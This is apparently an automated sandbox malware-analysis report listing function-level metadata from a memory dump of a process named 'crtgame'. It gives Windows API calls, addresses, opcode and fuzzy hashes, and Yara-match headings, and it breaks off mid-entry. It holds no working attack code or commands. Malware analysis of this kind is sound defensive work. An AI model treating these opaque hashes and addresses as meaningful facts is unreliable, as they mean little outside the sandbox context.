                                                                                            • API String ID: 4166353394-0
                                                                                            • Opcode ID: 88fbca0579c8858e90fe4a8c9eb6441e1e589313607e1f7270475234050d4d71
                                                                                            • Instruction ID: 22e4534ba118915c7a4078e55876ff62e2ea40d1af8b18c51bec98df4f6bef74
                                                                                            • Opcode Fuzzy Hash: 88fbca0579c8858e90fe4a8c9eb6441e1e589313607e1f7270475234050d4d71
                                                                                            • Instruction Fuzzy Hash: EC41CF71640315DBDB259F29CCC0B27B7E8EB85724F140A68EC18AB295DF34D8928F91
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A320AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A320CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A320D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02A3213E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A321A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1611172436-0
                                                                                            • Opcode ID: f6feeb6d4696d80443a7f9c4e8de10ced5fe96f0a3ab0fca41d11b87e8bbd5cb
                                                                                            • Instruction ID: c53951a5b4cd9e2d82b2ce09cc8d1c1c08aad15a007477dda500111bcfd7db7d
                                                                                            • Opcode Fuzzy Hash: f6feeb6d4696d80443a7f9c4e8de10ced5fe96f0a3ab0fca41d11b87e8bbd5cb
                                                                                            • Instruction Fuzzy Hash: 0C3148725447019FC312DF25D984A6BB7F9EFC8664F104A1EB89693650DB30E90ACBA2
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3DA89
                                                                                              • Part of subcall function 02A31A01: TlsGetValue.KERNEL32 ref: 02A31A0A
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A3DB08
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A3DB24
                                                                                            • InterlockedIncrement.KERNEL32(02A65170), ref: 02A3DB49
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A3DB5E
                                                                                              • Part of subcall function 02A327F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02A3284E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1578506061-0
                                                                                            • Opcode ID: 337e899ff174ca3658e49a7db52be84b9856a57e319249485c752c18196bf85b
                                                                                            • Instruction ID: 87735fc060ed14c81d49a7b8840c3b352b2867c01b265bf04d1bbebf5263eb72
                                                                                            • Opcode Fuzzy Hash: 337e899ff174ca3658e49a7db52be84b9856a57e319249485c752c18196bf85b
                                                                                            • Instruction Fuzzy Hash: 5B3137B1D01714EFCB11DFA8D9446AABBF8BF08310F10855AE849E7640EB34A605CFA0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A321DA
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A321ED
                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02A32224
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02A32237
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A32261
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32350
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32360
                                                                                              • Part of subcall function 02A32341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A32370
                                                                                              • Part of subcall function 02A32341: GetLastError.KERNEL32 ref: 02A3237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: d732cb7f09487d9ef1960b2bfb0ece38e97a804a1085c71335912f8ede57d6a0
                                                                                            • Instruction ID: 053165ee21810bdfd6a89c655cfc5fabd2e248173eb02340e3cdedfbc6921711
                                                                                            • Opcode Fuzzy Hash: d732cb7f09487d9ef1960b2bfb0ece38e97a804a1085c71335912f8ede57d6a0
                                                                                            • Instruction Fuzzy Hash: 68116D72D54228DBCB129FA9EC046AFFBBAFF44310F00455AFC15A2260EF718A11CB80
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3229D
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A322B0
                                                                                            • TlsGetValue.KERNEL32 ref: 02A322E7
                                                                                            • TlsSetValue.KERNEL32(?), ref: 02A32300
                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02A3231C
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32350
                                                                                              • Part of subcall function 02A32341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32360
                                                                                              • Part of subcall function 02A32341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A32370
                                                                                              • Part of subcall function 02A32341: GetLastError.KERNEL32 ref: 02A3237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: bfa592dcaf88c85479663a7b82d0853481d24862ca20a631da4f9935dfc17c0c
                                                                                            • Instruction ID: a843cb804425f24165b2784be30a2ab3756a80462415240bc73065fd8b388c6f
                                                                                            • Opcode Fuzzy Hash: bfa592dcaf88c85479663a7b82d0853481d24862ca20a631da4f9935dfc17c0c
                                                                                            • Instruction Fuzzy Hash: 5B112E72D50229ABCB029FA5ED446AEFFBAFF54710F00446AE815A3210DF718951DF90
                                                                                            APIs
                                                                                              • Part of subcall function 02A3AAEE: __EH_prolog.LIBCMT ref: 02A3AAF3
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A3B6B8
                                                                                              • Part of subcall function 02A43F5A: RaiseException.KERNEL32(?,?,?,02A60F6C,?,00000400,?,?,?,02A4359C,?,02A60F6C,00000000,00000001), ref: 02A43FAF
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02A61DA4,?,00000001), ref: 02A3B6CE
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A3B6E1
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02A61DA4,?,00000001), ref: 02A3B6F1
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A3B6FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2725315915-0
                                                                                            • Opcode ID: 25688900c6b515e150654487a5edea82a000fb4787195896079be8372ab96523
                                                                                            • Instruction ID: 0ba0bfda718c2d06502a585b8b6cce5c300f41bbd5979432ade289531f60a9a6
                                                                                            • Opcode Fuzzy Hash: 25688900c6b515e150654487a5edea82a000fb4787195896079be8372ab96523
                                                                                            • Instruction Fuzzy Hash: C101D1B2A40314AFDB109BA4DD88E9BB7EDEF04329B004955F615E7281DF60E8018B20
                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A32432
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A32445
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A32454
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A32469
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A32470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 747265849-0
                                                                                            • Opcode ID: 45bd68bfc43f9faffec703f555b914461ff0779aff312a852884a84ea6b52e8a
                                                                                            • Instruction ID: bc1929203269e88ab43cc87dc383ed6f560cde65def1bc972b375f5245626b7b
                                                                                            • Opcode Fuzzy Hash: 45bd68bfc43f9faffec703f555b914461ff0779aff312a852884a84ea6b52e8a
                                                                                            • Instruction Fuzzy Hash: 86F01D72680224BFD611ABA4EE89FDBB76CFF44711F800811F705E6480DB71E921CBA1
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02A31ED2
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02A31EEA
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A31EF9
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A31F0E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A31F15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 830998967-0
                                                                                            • Opcode ID: 2398ff591026ca53788b97ffcee513bec5baa5990443d7709c9eacc0e9ea3a8c
                                                                                            • Instruction ID: 59a2aa8e91a8405d9e56529bf658ca482f02cbed6560b7347991225d99caa3d1
                                                                                            • Opcode Fuzzy Hash: 2398ff591026ca53788b97ffcee513bec5baa5990443d7709c9eacc0e9ea3a8c
                                                                                            • Instruction Fuzzy Hash: 01F01D72641614BFD741AFA1ED88FC7B7ACFF04341F000412F60592841DB61E666CBA0
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02A330C3
                                                                                            • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02A33102
                                                                                            • _memcmp.LIBCMT ref: 02A33141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 1618111833-2422070025
                                                                                            • Opcode ID: 9da2f2fa7737f95f1af64c7471b9e56a6619836cc972357d4e81afb0d8602829
                                                                                            • Instruction ID: 678d12e68f85aa3637fc0e3f9768d64014b32fe2d0ca8948c055e444b21ab2c8
                                                                                            • Opcode Fuzzy Hash: 9da2f2fa7737f95f1af64c7471b9e56a6619836cc972357d4e81afb0d8602829
                                                                                            • Instruction Fuzzy Hash: 7B31E171D003189FDF219F64C88076EB7A6FF41324F1089A9F8559B280EF719945CBD1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A31F5B
                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02A31FC5
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02A31FD2
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                            • String ID: iocp
                                                                                            • API String ID: 998023749-976528080
                                                                                            • Opcode ID: 86b1187a907db1d13e60fcb0bcd790d6aa72b54da1dd70c619a02095846fd3cc
                                                                                            • Instruction ID: bfddfd671c7345c9c440bd2e9ff34283bb232947078514f5264cc2e883a0a411
                                                                                            • Opcode Fuzzy Hash: 86b1187a907db1d13e60fcb0bcd790d6aa72b54da1dd70c619a02095846fd3cc
                                                                                            • Instruction Fuzzy Hash: 3321E7B1801B549FC720DF6AC50055BFBF8FF94720B108A1FE8A693A90DBB0A644CF91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • std::exception::exception.LIBCMT ref: 02A43582
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A43597
                                                                                              • Part of subcall function 02A43F5A: RaiseException.KERNEL32(?,?,?,02A60F6C,?,00000400,?,?,?,02A4359C,?,02A60F6C,00000000,00000001), ref: 02A43FAF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3074076210-2104205924
                                                                                            • Opcode ID: 67adc07f96a1aa654fe8eca76ebfdc4e7e6b34d342186723c858f6528e7b72f8
                                                                                            • Instruction ID: f9f5b61b426d32f8e2432781d484f389b7f99ca54df8abc4dcfc045b766a5ab7
                                                                                            • Opcode Fuzzy Hash: 67adc07f96a1aa654fe8eca76ebfdc4e7e6b34d342186723c858f6528e7b72f8
                                                                                            • Instruction Fuzzy Hash: 90E0A03054020AAEDF00EBA4DE449BFB77AAF80310F600596AC14A5080DF71D744C9D1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A337B6
                                                                                            • __localtime64.LIBCMT ref: 02A337C1
                                                                                              • Part of subcall function 02A42000: __gmtime64_s.LIBCMT ref: 02A42013
                                                                                            • std::exception::exception.LIBCMT ref: 02A337D9
                                                                                              • Part of subcall function 02A41ED3: std::exception::_Copy_str.LIBCMT ref: 02A41EEC
                                                                                              • Part of subcall function 02A39EB1: __EH_prolog.LIBCMT ref: 02A39EB6
                                                                                              • Part of subcall function 02A39EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A39EC5
                                                                                              • Part of subcall function 02A39EB1: __CxxThrowException@8.LIBCMT ref: 02A39EE4
                                                                                            Strings
                                                                                            • could not convert calendar time to UTC time, xrefs: 02A337CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                            • API String ID: 1963798777-2088861013
                                                                                            • Opcode ID: 5fe8112b1b8d2bf2f8dd4154afcfda1c2f14e327082d9a31ffbb243ed2a7ba84
                                                                                            • Instruction ID: bc384eab5645bd89a89c07e2d163c5437828dd6642f6b7aa1008d26882366a1c
                                                                                            • Opcode Fuzzy Hash: 5fe8112b1b8d2bf2f8dd4154afcfda1c2f14e327082d9a31ffbb243ed2a7ba84
                                                                                            • Instruction Fuzzy Hash: DCE039B5D4021A9BCB11EFA0DA007AFB7B9EF04304F004599EC15A2240DF3896498F80
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02A34149), ref: 02A40DBF
                                                                                              • Part of subcall function 02A33FDC: __EH_prolog.LIBCMT ref: 02A33FE1
                                                                                              • Part of subcall function 02A33FDC: CreateEventA.KERNEL32(00000000,02A3A5C3,?,00000000), ref: 02A33FF3
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A40DB4
                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02A34149), ref: 02A40E00
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02A34149), ref: 02A40ED1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 2825413587-0
                                                                                            • Opcode ID: 1eda6cf6808e7eee0908ba5432b102a78ba1391ebd521706c27cee9a2c1c3e6d
                                                                                            • Instruction ID: 807b1cd01ea6fb6162e08efa4e0c433e3f02d3dd69ab0a72be57a762c06a80c4
                                                                                            • Opcode Fuzzy Hash: 1eda6cf6808e7eee0908ba5432b102a78ba1391ebd521706c27cee9a2c1c3e6d
                                                                                            • Instruction Fuzzy Hash: E951B1716003458FDB25DF28C88479ABBE4EF88328F190618F969A7390DF35E859CF91
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A4F94B
                                                                                            • __isleadbyte_l.LIBCMT ref: 02A4F979
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02A4F9A7
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02A4F9DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 21ecdc404efa70209cbfc0fd239b5ac4aa4461a924bc31a1f7632730f4f7b632
                                                                                            • Instruction ID: b012146db53cf831cff71e8eb51344939fecee8e9e5be7f37a31c84bbdb80524
                                                                                            • Opcode Fuzzy Hash: 21ecdc404efa70209cbfc0fd239b5ac4aa4461a924bc31a1f7632730f4f7b632
                                                                                            • Instruction Fuzzy Hash: 1F31CC31600246BFDB218F25CC84BBA7BA5BF81314F155529E865D75A1EF30D891DB90
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A4FDB0
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 501242067-0
                                                                                            • Opcode ID: fe92fb93bce0cc2b8f5a91f48ab6fa7c016f7d6a4eb6e9936383f02bd9901fd2
                                                                                            • Instruction ID: 7aa8f477b36946afa911643a35932d7547e4b67823a1a530c8b7daf28dbc609f
                                                                                            • Opcode Fuzzy Hash: fe92fb93bce0cc2b8f5a91f48ab6fa7c016f7d6a4eb6e9936383f02bd9901fd2
                                                                                            • Instruction Fuzzy Hash: A811E332C80715EFCF212F70AE4879E379A9FD0366F105529E94DDA541DF34C8518E94
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A41D92
                                                                                            • ___ascii_stricmp.LIBCMT ref: 02A41DCA
                                                                                            • __tolower_l.LIBCMT ref: 02A41DE0
                                                                                              • Part of subcall function 02A4537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A45388
                                                                                              • Part of subcall function 02A4537A: __isctype_l.LIBCMT ref: 02A453A9
                                                                                            • __tolower_l.LIBCMT ref: 02A41DEF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
                                                                                            • String ID:
                                                                                            • API String ID: 2995433114-0
                                                                                            • Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                                            • Instruction ID: 356265d5c16ce897065fe220a085f8fc17e90877bdb46634ae15fa29de9558dd
                                                                                            • Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                                            • Instruction Fuzzy Hash: 8711EC72D00225AFD710AB78C8C5BBE7BB9AB81365F540798E42957181DF70DD40CBD0
                                                                                            APIs
                                                                                            • htons.WS2_32(?), ref: 02A33DA2
                                                                                              • Part of subcall function 02A33BD3: __EH_prolog.LIBCMT ref: 02A33BD8
                                                                                              • Part of subcall function 02A33BD3: std::bad_exception::bad_exception.LIBCMT ref: 02A33BED
                                                                                            • htonl.WS2_32(00000000), ref: 02A33DB9
                                                                                            • htonl.WS2_32(00000000), ref: 02A33DC0
                                                                                            • htons.WS2_32(?), ref: 02A33DD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                            • String ID:
                                                                                            • API String ID: 3882411702-0
                                                                                            • Opcode ID: caefce10d16179068722ca850e734487c7459b02c2d42468e0ff1068ee466733
                                                                                            • Instruction ID: 38844caca31537f82c8eaf79144f2ab51e44211237568f189f78ca978d09aa27
                                                                                            • Opcode Fuzzy Hash: caefce10d16179068722ca850e734487c7459b02c2d42468e0ff1068ee466733
                                                                                            • Instruction Fuzzy Hash: AB11C235940308EFCF019F64D885A5AB7B9FF08310F008896FD08DF204DA71D915CBA1
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02A3335F,?,?,?,?,?), ref: 02A323D0
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A323DE
                                                                                            • InterlockedExchange.KERNEL32(00000030,00000001), ref: 02A32401
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A32408
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            • Opcode ID: f3b2cbbd12d1fd5ba806fe296522f76808440103444e057d61488caaad42c697
                                                                                            • Instruction ID: 4ac32fe651b28145dcc76d01a5b9372b068ef3e02c337bff13b579b857ac58c3
                                                                                            • Opcode Fuzzy Hash: f3b2cbbd12d1fd5ba806fe296522f76808440103444e057d61488caaad42c697
                                                                                            • Instruction Fuzzy Hash: 1C117C71640305ABDB219F60DD84BABBBB9FF44715F1044A9F9019A540DFB1ED51CBA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                            • Instruction ID: 2651a139eb32ca436d7f94e0031911e3330320964a3a90a61f7c7dbaf42c5697
                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                            • Instruction Fuzzy Hash: A101393204114ABBCF126FD4CC418EE7F23BB59664B488516FE2859031DB76CAB1AB91
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A324A9
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A324B8
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A324CD
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A324D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            • Opcode ID: 8523689f21d3cd27ef57db065e78d9c3c85409a7de853a40b0e8680840e53fa9
                                                                                            • Instruction ID: cdfbce2004af310235b09d548dc07e41f6c71e8d4a75e97db304fd73f8ccc176
                                                                                            • Opcode Fuzzy Hash: 8523689f21d3cd27ef57db065e78d9c3c85409a7de853a40b0e8680840e53fa9
                                                                                            • Instruction Fuzzy Hash: D6F03C72640214AFDB00AF65ED84B9BBBACFF44710F004415FA09D6541DB71E961CFA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A32009
                                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02A32028
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A32037
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A3204E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
